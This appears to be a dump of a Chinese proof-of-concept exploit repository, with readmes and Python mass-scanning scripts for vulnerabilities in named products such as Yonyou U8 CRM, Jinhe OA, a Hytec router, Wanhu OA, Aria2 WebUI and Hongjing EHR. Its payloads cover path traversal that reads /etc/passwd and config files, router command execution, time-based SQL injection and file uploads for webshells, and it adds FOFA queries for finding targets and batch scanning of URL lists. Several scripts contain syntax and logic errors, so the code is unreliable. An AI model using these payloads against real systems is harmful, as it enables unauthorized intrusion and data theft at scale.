Password') 86 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 87 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 88 | args = parser.parse_args() 89 | 90 | if args.url and not args.file: 91 | if "https://" in args.url or "http://" in args.url: 92 | url = args.url 93 | else: 94 | host, port = extract_host(args.url) 95 | url = f"http://{host}:{port}" 96 | poc(url) 97 | 98 | elif args.url is None and args.file is not None: 99 | url_list = [] 100 | with open(args.file, "r", encoding="utf-8") as f: 101 | for url in f.readlines(): 102 | url = url.strip().replace("\n", "") 103 | if "https://" in url or "http://" in url: 104 | url = 
url 105 | else: 106 | host, port = extract_host(url) 107 | url = f"http://{host}:{port}" 108 | url_list.append(url) 109 | 110 | pool = Pool(10) 111 | pool.map(poc, url_list) 112 | pool.close() 113 | pool.join() 114 | 115 | else: 116 | parser.print_help() 117 | 118 | 119 | if __name__ == '__main__': 120 | main() 121 | -------------------------------------------------------------------------------- /20240112用友U8 CRM系统help2 任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友U8 CRM系统help2 任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | FOFA:title="用友U8CRM" 8 | 9 | GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1 10 | 11 | Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 12 | 13 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 14 | 15 | Accept-Encoding: gzip, deflate 16 | 17 | DNT: 1 18 | 19 | Connection: close 20 | 21 | Upgrade-Insecure-Requests: 1 22 | 23 | 批量poc(记得安装库) 24 | 25 | python poc.py -u 26 | 27 | python poc.py -f .txt 28 | 29 | 结果保存至result.txt 30 | 31 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 32 | -------------------------------------------------------------------------------- /20240115金和OA C6 upload_json.asp存在任意文件上传漏洞/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240115金和OA C6 upload_json.asp存在任意文件上传漏洞/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240115金和OA C6 upload_json.asp存在任意文件上传漏洞/assets/image-20240115225358128.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240115金和OA C6 upload_json.asp存在任意文件上传漏洞/assets/image-20240115225358128.png -------------------------------------------------------------------------------- /20240115金和OA C6 upload_json.asp存在任意文件上传漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 金和OA C6 upload_json.asp存在任意文件上传漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | FOFA指纹:app="金和网络-金和OA" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 利用替换文件内容上传shelll 16 | 17 | ![image-20240115225358128](assets/image-20240115225358128.png) 18 | 19 | 20 | 21 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 22 | -------------------------------------------------------------------------------- /20240118某擎rptsvr 任意文件上传/assets/image-20240118193841950.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240118某擎rptsvr 任意文件上传/assets/image-20240118193841950.png -------------------------------------------------------------------------------- /20240118某擎rptsvr 任意文件上传/assets/image-20240118194414299.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240118某擎rptsvr 任意文件上传/assets/image-20240118194414299.png -------------------------------------------------------------------------------- /20240118某擎rptsvr 任意文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # 奇安信 天擎 rptsvr 任意文件上传 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa:banner="QiAnXin web server" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 利用替换文件内容上传shelll 16 | 17 | ![image-20240118193841950](assets/image-20240118193841950.png) 18 | 19 | 入圈![image-20240118194414299](assets/image-20240118194414299.png) 20 | -------------------------------------------------------------------------------- /20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123506173.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123506173.png -------------------------------------------------------------------------------- /20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123615474.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123615474.png -------------------------------------------------------------------------------- /20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/readme.md: -------------------------------------------------------------------------------- 1 | # cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa: body="local/NVT-string.js" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 修改账号密码![image-20240121123506173](assets/image-20240121123506173.png) 16 | 17 | 入圈(限时体验) 18 | 19 | ![image-20240121123620660](assets/image-20240121123620660.png)s 20 | 21 | ![image-20240121123615474](assets/image-20240121123615474.png) 22 | -------------------------------------------------------------------------------- /20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/assets/image-20240122222409091.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/assets/image-20240122222409091.png -------------------------------------------------------------------------------- /20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P 
Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a Hytec Inter HWL 2511 SS 路由器 命令执行漏洞 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target[:-1] 36 | else: 37 | target = target 38 | url = target + "/cgi-bin/popen.cgi?command=whoami" 39 | 40 | headers = { 41 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", 42 | "Accept-Encoding": "gzip, deflate", 43 | "Upgrade-Insecure-Requests": "1", 44 | "TContent-Length": "35", 45 | "Te": "trailers", 46 | "Connection": "close" 47 | } 48 | 49 | 50 | 51 | try: 52 | response1 = requests.get(url, headers=headers, verify=False, timeout=15) 53 | # print(response.request.headers) 54 | # print(response.request.body) 55 | # print(response.text) 56 | 57 | if response1.status_code = "200": 58 | if "sh:" or "s h :" or "eth0" or "e t h 0" in response1.text : 59 | print(f"[++++++] {target} 存在 命令执行漏洞") 60 | with open("result.txt", "a+", encoding="utf-8") as f: 61 | f.write(url_result + "\n") 62 | else: 63 | print(f"[++++++] {target} 存在 命令执行漏洞,但有点小问题,可能这个命令给你屏蔽了") 64 | else: 65 | print(f"[-] {target} 不存在 命令执行漏洞") 66 | except Exception as e: 67 | print(f"[*] {target} error: {str(e)}") 68 | 69 | 70 | def extract_host(url): 71 | """ 72 | 从 URL 中提取主机地址和端口号,返回 (host, port) 73 | """ 74 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 75 | if match: 76 | prefix, host, port = match.groups() 77 | if not port: 78 | if prefix and "https" in prefix: 79 | port = "443" 80 | else: 81 | port = "80" 82 | return host, int(port) 83 | else: 84 | return None, None 85 | 86 | 87 | def main(): 88 | banner() 89 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 90 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 91 | parser.add_argument("-f", "--file", dest="file", type=str, help=" 
urls.txt") 92 | args = parser.parse_args() 93 | 94 | if args.url and not args.file: 95 | if "https://" in args.url or "http://" in args.url: 96 | url = args.url 97 | else: 98 | host, port = extract_host(args.url) 99 | url = f"http://{host}:{port}" 100 | poc(url) 101 | 102 | elif args.url is None and args.file is not None: 103 | url_list = [] 104 | with open(args.file, "r", encoding="utf-8") as f: 105 | for url in f.readlines(): 106 | url = url.strip().replace("\n", "") 107 | if "https://" in url or "http://" in url: 108 | url = url 109 | else: 110 | host, port = extract_host(url) 111 | url = f"http://{host}:{port}" 112 | url_list.append(url) 113 | 114 | pool = Pool(10) 115 | pool.map(poc, url_list) 116 | pool.close() 117 | pool.join() 118 | 119 | else: 120 | parser.print_help() 121 | 122 | 123 | if __name__ == '__main__': 124 | main() 125 | -------------------------------------------------------------------------------- /20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa: body="local/NVT-string.js" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 16 | 17 | ## 入圈(限时体验) 18 | 19 | ![image-20240122222409091](assets/image-20240122222409091.png) 20 | 21 | ![image-20240121123620660](assets/image-20240121123620660.png)s 22 | 23 | -------------------------------------------------------------------------------- /20240126Laykefu客服系统 任意文件上传漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240126Laykefu客服系统 任意文件上传漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240126Laykefu客服系统 任意文件上传漏洞/assets/image-20240126001223257.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240126Laykefu客服系统 任意文件上传漏洞/assets/image-20240126001223257.png -------------------------------------------------------------------------------- /20240126Laykefu客服系统 任意文件上传漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # Laykefu客服系统 任意文件上传漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | icon_hash="-334624619" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 16 | 17 | ## 入圈(限时体验) 18 | 19 | ![image-20240126001223257](assets/image-20240126001223257.png) 20 | 21 | ![image-20240121123620660](assets/image-20240121123620660.png)s 22 | 23 | -------------------------------------------------------------------------------- /20240127万户OA text2Html 任意文件读取/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240127万户OA text2Html 任意文件读取/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240127万户OA text2Html 任意文件读取/assets/image-20240127122138808.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240127万户OA text2Html 任意文件读取/assets/image-20240127122138808.png -------------------------------------------------------------------------------- /20240127万户OA text2Html 任意文件读取/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | 9 | import requests 10 | import urllib3 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this 
is a 万户OA text2Html 任意文件读取 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | url = target + "/defaultroot/convertFile/text2Html.controller" 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 43 | "Connection": "close", 44 | "Content-Length": "63", 45 | "Accept-Encoding": "gzip, deflate, br", 46 | "Content-Type": "application/x-www-form-urlencoded", 47 | "SL-CE-SUID": "1081" 48 | } 49 | data = { 50 | "saveFileName": "123456/../../../../WEB-INF/web.xml", 51 | "moduleName": "html" 52 | } 53 | 54 | try: 55 | response1 = requests.post(url, headers=headers, data=data,verify=False, timeout=15) 56 | # print(response1.text) 57 | if response1.status_code = "200" and len(response1.text) > 10000: 58 | print(f"[++++++] {target} 存在 任意文件读取") 59 | with open("result.txt", "a+", encoding="utf-8") as f: 60 | f.write(target + "\n") 61 | 62 | else: 63 | print(f"[-] {target} 请求error") 64 | except Exception as e: 65 | print(f"[*] {target} error: {str(e)}") 66 | 67 | 68 | def extract_host(url): 69 | """ 70 | 从 URL 中提取主机地址和端口号,返回 (host, port) 71 | """ 72 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 73 | if match: 74 | prefix, host, port = match.groups() 75 | if not port: 76 | if prefix and "https" in prefix: 77 | port = "443" 78 | else: 79 | port = "80" 80 | return host, int(port) 81 | else: 82 | return None, None 83 | 84 | 85 | def main(): 86 | banner() 87 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 88 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 89 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 90 | args = parser.parse_args() 91 | 92 | if args.url and not args.file: 93 | if "https://" in args.url or "http://" in args.url: 94 | url 
= args.url 95 | else: 96 | host, port = extract_host(args.url) 97 | url = f"http://{host}:{port}" 98 | poc(url) 99 | 100 | elif args.url is None and args.file is not None: 101 | url_list = [] 102 | with open(args.file, "r", encoding="utf-8") as f: 103 | for url in f.readlines(): 104 | url = url.strip().replace("\n", "") 105 | if "https://" in url or "http://" in url: 106 | url = url 107 | else: 108 | host, port = extract_host(url) 109 | url = f"http://{host}:{port}" 110 | url_list.append(url) 111 | 112 | pool = Pool(10) 113 | pool.map(poc, url_list) 114 | pool.close() 115 | pool.join() 116 | 117 | else: 118 | parser.print_help() 119 | 120 | 121 | if __name__ == '__main__': 122 | main() 123 | -------------------------------------------------------------------------------- /20240127万户OA text2Html 任意文件读取/readme.md: -------------------------------------------------------------------------------- 1 | # 万户OA text2Html 任意文件读取 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa:app="万户网络-ezOFFICE" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 16 | 17 | ## 入圈(限时体验) 18 | 19 | ![image-20240127122138808](assets/image-20240127122138808.png) 20 | 21 | ![image-20240121123620660](assets/image-20240121123620660.png)s 22 | 23 | -------------------------------------------------------------------------------- /20240128Aria2 WebUI文件读取/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240128Aria2 WebUI文件读取/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240128Aria2 WebUI文件读取/assets/image-20240127122138808.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240128Aria2 WebUI文件读取/assets/image-20240127122138808.png -------------------------------------------------------------------------------- /20240128Aria2 WebUI文件读取/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | 9 | import requests 10 | import urllib3 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a Aria2 WebUI文件读取 29 | 
@version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | url = target + "/../../../../etc/passwd" 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 43 | "Accept-Encoding": "gzip, deflate", 44 | "Connection": "close", 45 | "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8" 46 | 47 | } 48 | 49 | 50 | try: 51 | response1 = requests.get(url, headers=headers, verify=False, timeout=15) 52 | # print(response1.text) 53 | if response1.status_code = "200" and "root" in response1.text: 54 | print(f"[++++++] {target} 存在 任意文件读取") 55 | with open("result.txt", "a+", encoding="utf-8") as f: 56 | f.write(target + "\n") 57 | 58 | else: 59 | print(f"[-] {target} 请求error") 60 | except Exception as e: 61 | print(f"[*] {target} error: {str(e)}") 62 | 63 | 64 | def extract_host(url): 65 | """ 66 | 从 URL 中提取主机地址和端口号,返回 (host, port) 67 | """ 68 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 69 | if match: 70 | prefix, host, port = match.groups() 71 | if not port: 72 | if prefix and "https" in prefix: 73 | port = "443" 74 | else: 75 | port = "80" 76 | return host, int(port) 77 | else: 78 | return None, None 79 | 80 | 81 | def main(): 82 | banner() 83 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 84 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 85 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 86 | args = parser.parse_args() 87 | 88 | if args.url and not args.file: 89 | if "https://" in args.url or "http://" in args.url: 90 | url = args.url 91 | else: 92 | host, port = extract_host(args.url) 93 | url = f"http://{host}:{port}" 94 | poc(url) 95 | 96 | elif args.url is None and args.file is not None: 97 | url_list = [] 98 | with open(args.file, "r", 
encoding="utf-8") as f: 99 | for url in f.readlines(): 100 | url = url.strip().replace("\n", "") 101 | if "https://" in url or "http://" in url: 102 | url = url 103 | else: 104 | host, port = extract_host(url) 105 | url = f"http://{host}:{port}" 106 | url_list.append(url) 107 | 108 | pool = Pool(10) 109 | pool.map(poc, url_list) 110 | pool.close() 111 | pool.join() 112 | 113 | else: 114 | parser.print_help() 115 | 116 | 117 | if __name__ == '__main__': 118 | main() 119 | -------------------------------------------------------------------------------- /20240128Aria2 WebUI文件读取/readme.md: -------------------------------------------------------------------------------- 1 | # Aria2 WebUI文件读取 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | GET /../../../../etc/passwd HTTP/1.1 6 | Host: 7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 8 | Accept-Encoding: gzip, deflate 9 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 10 | Connection: close 11 | 12 | 批量poc(记得安装库) 13 | 14 | python poc.py -u 15 | 16 | python poc.py -f .txt 17 | 18 | 结果保存至result.txt 19 | 20 | 21 | 22 | ## 入圈(限时体验) 23 | 24 | ![image-20240127122138808](assets/image-20240127122138808.png) 25 | 26 | ![image-20240121123620660](assets/image-20240121123620660.png)s 27 | 28 | -------------------------------------------------------------------------------- /20240129宏景EHR view接口sql注入漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240129宏景EHR view接口sql注入漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240129宏景EHR view接口sql注入漏洞/assets/image-20240127122138808.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240129宏景EHR view接口sql注入漏洞/assets/image-20240127122138808.png -------------------------------------------------------------------------------- /20240129宏景EHR view接口sql注入漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | 9 | import requests 10 | import urllib3 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 宏景EHR view接口sql注入漏洞POC 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | url = target + "/templates/attestation/../../general/info/view" 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 43 | "Content-Type": "application/x-www-form-urlencoded" 44 | 45 | } 46 | data = { 47 | "kind": "1", 48 | "a0100": "11';WAITFOR DELAY '0:0:5'--" 49 | } 50 | 51 | 52 | try: 53 | response1 = requests.post(url, data=data, headers=headers, verify=False, timeout=15) 54 | # print(response1.text) 55 | response1_time = response1.elapsed.total_seconds() 56 | if response1.status_code == "200" and response1_time > 4: 57 | print(f"[++++++] {target} 存在 任意文件读取") 58 | with open("result.txt", "a+", encoding="utf-8") as f: 59 | 
f.write(target + "\n") 60 | 61 | else: 62 | print(f"[-] {target} 不存在") 63 | except Exception as e: 64 | print(f"[*] {target} error: {str(e)}") 65 | 66 | 67 | def extract_host(url): 68 | """ 69 | 从 URL 中提取主机地址和端口号,返回 (host, port) 70 | """ 71 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 72 | if match: 73 | prefix, host, port = match.groups() 74 | if not port: 75 | if prefix and "https" in prefix: 76 | port = "443" 77 | else: 78 | port = "80" 79 | return host, int(port) 80 | else: 81 | return None, None 82 | 83 | 84 | def main(): 85 | banner() 86 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 87 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 88 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 89 | args = parser.parse_args() 90 | 91 | if args.url and not args.file: 92 | if "https://" in args.url or "http://" in args.url: 93 | url = args.url 94 | else: 95 | host, port = extract_host(args.url) 96 | url = f"http://{host}:{port}" 97 | poc(url) 98 | 99 | elif args.url is None and args.file is not None: 100 | url_list = [] 101 | with open(args.file, "r", encoding="utf-8") as f: 102 | for url in f.readlines(): 103 | url = url.strip().replace("\n", "") 104 | if "https://" in url or "http://" in url: 105 | url = url 106 | else: 107 | host, port = extract_host(url) 108 | url = f"http://{host}:{port}" 109 | url_list.append(url) 110 | 111 | pool = Pool(10) 112 | pool.map(poc, url_list) 113 | pool.close() 114 | pool.join() 115 | 116 | else: 117 | parser.print_help() 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /20240129宏景EHR view接口sql注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 宏景EHR view接口sql注入漏洞POC 2 | 3 | 
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:app="HJSOFT-HCM" 6 | 7 | 8 | POST /templates/attestation/../../general/info/view HTTP/1.1 9 | Host: xxxx 10 | Content-Type: application/x-www-form-urlencoded 11 | 12 | kind=1&a0100=11';WAITFOR+DELAY+'0:0:5'-- 13 | 14 | 批量poc(记得安装库) 15 | 16 | python poc.py -u 17 | 18 | python poc.py -f .txt 19 | 20 | 结果保存至result.txt 21 | 22 | 23 | 24 | ## 入圈(限时体验) 25 | 26 | ![image-20240127122138808](assets/image-20240127122138808.png) 27 | 28 | ![image-20240121123620660](assets/image-20240121123620660.png)s 29 | 30 | -------------------------------------------------------------------------------- /20240201用友系统-U9企业版存在任意文件上传漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240201用友系统-U9企业版存在任意文件上传漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240201用友系统-U9企业版存在任意文件上传漏洞/assets/image-20240127122138808.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240201用友系统-U9企业版存在任意文件上传漏洞/assets/image-20240127122138808.png -------------------------------------------------------------------------------- /20240201用友系统-U9企业版存在任意文件上传漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友系统-U9企业版存在任意文件上传漏洞 2 | 3 | 